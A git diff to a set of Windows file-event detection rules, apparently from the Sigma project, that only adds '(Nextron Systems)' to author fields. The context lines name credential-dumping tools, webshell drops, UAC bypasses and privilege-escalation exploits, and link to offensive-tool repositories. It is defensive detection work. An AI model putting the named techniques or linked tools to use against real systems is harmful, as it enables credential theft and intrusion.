(Nextron Systems) date: 2022/10/26 modified: 2022/12/30 tags: diff --git a/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml b/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml index 810c6cc6e..e810a424b 100644 --- a/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml +++ b/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml @@ -7,7 +7,7 @@ description: | which is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/28 tags: - attack.command_and_control diff --git a/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml b/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml index ea83cc117..5442b3a5c 100644 --- a/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml +++ b/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious file creation patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/12 modified: 2022/05/27 tags: diff --git a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml index 23c65c682..187b8afab 100644 --- a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml +++ b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml @@ -11,7 +11,7 @@ references: - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/ - https://github.com/Wh04m1001/SysmonEoP - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/01 modified: 2022/12/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml b/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml index 30015e28b..9a1479ec1 100644 --- a/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml @@ -6,7 +6,7 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/06/29 modified: 2022/12/25 tags: diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml b/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml index e205412d6..c3ad5dcfc 100644 --- a/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml +++ b/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml @@ -5,7 +5,7 @@ description: Detects signs of the exploitation of LPE CVE-2021-41379 that includ references: - https://github.com/klinix5/InstallerFileTakeOver - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/22 modified: 2022/12/25 tags: diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml b/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml index 238d5900d..62cc66152 100644 --- a/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml +++ b/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml @@ -5,7 +5,7 @@ description: Detects the creation of "msiexec.exe" in the "bin" directory of the references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/06 tags: - attack.execution diff --git a/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml b/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml index ae0f17b84..e846559e3 100644 --- a/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml +++ b/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml @@ -4,7 +4,7 @@ status: experimental description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache references: - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/13 tags: - attack.privilege_escalation diff --git a/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml b/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml index e420bb832..0b9d41acd 100644 --- a/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml +++ b/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml @@ -7,7 +7,7 @@ description: | references: - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/ - https://github.com/last-byte/PersistenceSniper -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/09 modified: 2022/12/19 tags: diff --git a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml index 59e2d8a5f..b29ab3b72 100644 --- a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml +++ b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml @@ -9,7 +9,7 @@ references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html -author: Florian Roth (rule), MSTI (query, idea) +author: Florian Roth (Nextron Systems), MSTI (query, idea) date: 2022/10/01 tags: - attack.persistence diff --git a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml index 1c3900cfc..305edacbd 100644 --- a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml +++ b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml @@ -9,7 +9,7 @@ references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/04 tags: - attack.persistence diff --git a/rules/windows/file/file_event/file_event_win_hack_dumpert.yml b/rules/windows/file/file_event/file_event_win_hack_dumpert.yml index 3a4290d13..2551f4319 100755 --- a/rules/windows/file/file_event/file_event_win_hack_dumpert.yml +++ b/rules/windows/file/file_event/file_event_win_hack_dumpert.yml @@ -8,7 +8,7 @@ description: Detects the use of Dumpert process dumper, which dumps the lsass.ex references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/02/04 modified: 2022/12/02 tags: diff --git a/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml b/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml index e5532258a..becfff800 100644 --- a/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml +++ b/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml @@ -7,7 +7,7 @@ references: - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare - https://twitter.com/cube0x0/status/1418920190759378944 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/23 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml b/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml index 9bd4ed6aa..39e532a2f 100644 --- a/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml +++ b/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml @@ -5,7 +5,7 @@ description: Detects the use of NPPSpy hacktool that stores cleartext passwords references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy - https://twitter.com/0gtweet/status/1465282548494487554 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/29 modified: 2022/12/25 tags: diff --git a/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml b/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml index 7f09963f8..c9d5877ff 100644 --- a/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml +++ b/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml @@ -2,7 +2,7 @@ title: Inveigh Execution Artefacts id: bb09dd3e-2b78-4819-8e35-a7c1b874e449 status: experimental description: Detects the presence and execution of Inveigh via dropped artefacts -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) references: - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs diff --git a/rules/windows/file/file_event/file_event_win_iso_file_recent.yml b/rules/windows/file/file_event/file_event_win_iso_file_recent.yml index 373270ab6..a6c96523f 100644 --- a/rules/windows/file/file_event/file_event_win_iso_file_recent.yml +++ b/rules/windows/file/file_event/file_event_win_iso_file_recent.yml @@ -9,7 +9,7 @@ references: - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore - https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ - https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/11 logsource: product: windows diff --git a/rules/windows/file/file_event/file_event_win_lsass_dump.yml b/rules/windows/file/file_event/file_event_win_lsass_dump.yml index 7184c6c4d..5ea1eb271 100644 --- a/rules/windows/file/file_event/file_event_win_lsass_dump.yml +++ b/rules/windows/file/file_event/file_event_win_lsass_dump.yml @@ -11,7 +11,7 @@ references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - https://github.com/helpsystems/nanodump -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/15 modified: 2022/06/27 tags: diff --git a/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml b/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml index e0ead914e..c95398dea 100644 --- a/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml +++ b/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml @@ -4,7 +4,7 @@ status: experimental description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials references: - https://github.com/helpsystems/nanodump -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/27 tags: - attack.credential_access diff --git a/rules/windows/file/file_event/file_event_win_mal_adwind.yml b/rules/windows/file/file_event/file_event_win_mal_adwind.yml index 1b454703c..bc0e4c945 100644 --- a/rules/windows/file/file_event/file_event_win_mal_adwind.yml +++ b/rules/windows/file/file_event/file_event_win_mal_adwind.yml @@ -8,7 +8,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf -author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 modified: 2022/12/02 tags: diff --git a/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml b/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml index 3e5ceac63..c7a59b159 100644 --- a/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml +++ b/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz references: - https://cobalt.io/blog/kerberoast-attack-techniques -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/08 tags: - attack.credential_access diff --git a/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml b/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml index 00df15a95..0bcabe0d8 100644 --- a/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml +++ b/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 modified: 2022/10/28 tags: diff --git a/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml index 47888c46d..6c8d3124a 100644 --- a/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/10 modified: 2023/01/05 tags: diff --git a/rules/windows/file/file_event/file_event_win_ntds_dit.yml b/rules/windows/file/file_event/file_event_win_ntds_dit.yml index dfa976046..80ace4d8a 100644 --- a/rules/windows/file/file_event/file_event_win_ntds_dit.yml +++ b/rules/windows/file/file_event/file_event_win_ntds_dit.yml @@ -7,7 +7,7 @@ references: - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - https://pentestlab.blog/tag/ntds-dit/ - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/11 modified: 2023/01/05 tags: diff --git a/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml b/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml index 69f3818c5..db55e294c 100644 --- a/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml +++ b/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml @@ -6,7 +6,7 @@ references: - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1 - https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/11 tags: - attack.credential_access diff --git a/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml b/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml index 40cbbb396..09bbf4087 100644 --- a/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml +++ b/rules/windows/file/file_event/file_event_win_one_extension_files_in_susp_locations.yml @@ -5,7 +5,7 @@ description: Detects creation of files with the ".one" extension in suspicious o references: - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/ - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/22 tags: - attack.defense_evasion diff --git a/rules/windows/file/file_event/file_event_win_outlook_newform.yml b/rules/windows/file/file_event/file_event_win_outlook_newform.yml index 5c5e86082..5c4622c5b 100644 --- a/rules/windows/file/file_event/file_event_win_outlook_newform.yml +++ b/rules/windows/file/file_event/file_event_win_outlook_newform.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of new Outlook form which can contain malicious code references: - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20 -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/10 modified: 2022/06/16 tags: diff --git a/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml b/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml index 5d0ce7eac..94593ccba 100644 --- a/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml +++ b/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml @@ -23,7 +23,7 @@ references: - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ - https://github.com/besimorhino/powercat -author: Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein +author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein date: 2018/04/07 modified: 2023/01/23 tags: diff --git a/rules/windows/file/file_event/file_event_win_psexec_service_key.yml b/rules/windows/file/file_event/file_event_win_psexec_service_key.yml index 1e2dda422..7f2c10487 100644 --- a/rules/windows/file/file_event/file_event_win_psexec_service_key.yml +++ b/rules/windows/file/file_event/file_event_win_psexec_service_key.yml @@ -5,7 +5,7 @@ description: Detects creation of the PSEXEC key file. Which is created anytime a references: - https://aboutdfir.com/the-key-to-identify-psexec/ - https://twitter.com/davisrichardg/status/1616518800584704028 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/21 tags: - attack.lateral_movement diff --git a/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml b/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml index 8e92311ac..cf3d70e43 100755 --- a/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml +++ b/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml @@ -4,7 +4,7 @@ status: test description: Detects a dump file written by QuarksPwDump password dumper references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/02/10 modified: 2021/11/27 tags: diff --git a/rules/windows/file/file_event/file_event_win_sam_dump.yml b/rules/windows/file/file_event/file_event_win_sam_dump.yml index a82debc61..54daa898c 100644 --- a/rules/windows/file/file_event/file_event_win_sam_dump.yml +++ b/rules/windows/file/file_event/file_event_win_sam_dump.yml @@ -8,7 +8,7 @@ references: - https://www.google.com/search?q=%22reg.exe+save%22+sam - https://github.com/HuskyHacks/ShadowSteal - https://github.com/FireFart/hivenightmare -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/11 modified: 2023/01/05 tags: diff --git a/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml b/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml index e66c473f2..21d5aab7b 100644 --- a/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml +++ b/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a Windows executable that writes files to suspicious folders references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/20 modified: 2023/01/05 logsource: diff --git a/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml b/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml index 7747fcde6..b7b08d94a 100644 --- a/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml @@ -7,7 +7,7 @@ status: experimental description: Detects windows executables that writes files with suspicious extensions references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 modified: 2022/09/27 logsource: diff --git a/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml b/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml index 0c61bb03d..6b226ce0a 100644 --- a/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml +++ b/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml @@ -5,7 +5,7 @@ description: Detects a suspicious Microsoft desktopimgdownldr file creation that references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/03 modified: 2022/06/02 tags: diff --git a/rules/windows/file/file_event/file_event_win_susp_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_double_extension.yml index b59852995..428b738ad 100644 --- a/rules/windows/file/file_event/file_event_win_susp_double_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_double_extension.yml @@ -13,7 +13,7 @@ references: - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles - https://twitter.com/malwrhunterteam/status/1235135745611960321 - https://twitter.com/luc4m/status/1073181154126254080 -author: Nasreddine Bencherchali, frack113 +author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2022/06/19 modified: 2022/11/07 tags: diff --git a/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml b/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml index 18333fe73..aea283dcf 100644 --- a/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml +++ b/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation references: - https://redcanary.com/blog/blackbyte-ransomware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/25 tags: - attack.initial_access diff --git a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml index 5f407aeec..d99038b49 100644 --- a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml @@ -11,7 +11,7 @@ references: - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles - https://twitter.com/malwrhunterteam/status/1235135745611960321 - https://twitter.com/luc4m/status/1073181154126254080 -author: Nasreddine Bencherchali, frack113 +author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2022/11/07 tags: - attack.defense_evasion diff --git a/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml b/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml index 3d71df8d5..8b51a9b82 100644 --- a/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml +++ b/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml @@ -5,7 +5,7 @@ description: Detects suspicious processes that write (copy) a Active Directory d references: - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/ - https://adsecurity.org/?p=2398 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/11 modified: 2022/07/14 tags: diff --git a/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml b/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml index 5426d6bc5..838a2f5f9 100644 --- a/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml +++ b/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 tags: - attack.defense_evasion diff --git a/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml b/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml index 4fdff1339..ac6800220 100644 --- a/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml +++ b/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml @@ -7,7 +7,7 @@ status: experimental description: Detects when a file with a suspicious extension is created in the startup folder references: - https://github.com/last-byte/PersistenceSniper -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/10 modified: 2023/01/06 tags: diff --git a/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml b/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml index 08b533453..d6d82c8c7 100644 --- a/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml +++ b/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2022/08/13 logsource: diff --git a/rules/windows/file/file_event/file_event_win_susp_task_write.yml b/rules/windows/file/file_event/file_event_win_susp_task_write.yml index cfd6ded58..d85c1b0d9 100644 --- a/rules/windows/file/file_event/file_event_win_susp_task_write.yml +++ b/rules/windows/file/file_event/file_event_win_susp_task_write.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of tasks from processes executed from suspicious locations references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/16 modified: 2022/01/12 tags: diff --git a/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml index 997f08fc6..7be47551b 100644 --- a/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of log files during a TeamViewer remote session references: - https://www.teamviewer.com/en-us/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/30 tags: - attack.command_and_control diff --git a/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml b/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml index f5d2001a0..eb023d40d 100644 --- a/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml +++ b/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml @@ -7,7 +7,7 @@ status: experimental description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/24 modified: 2023/01/06 tags: diff --git a/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml b/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml index 28746ba13..ac93fd74b 100644 --- a/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml +++ b/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml @@ -5,7 +5,7 @@ description: Detects potential privilege escalation attempt via the creation of references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt -author: Nasreddine Bencherchali, Subhash P (@pbssubhash) +author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) date: 2022/12/16 modified: 2022/12/19 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml index 14c550838..39aaedb03 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml 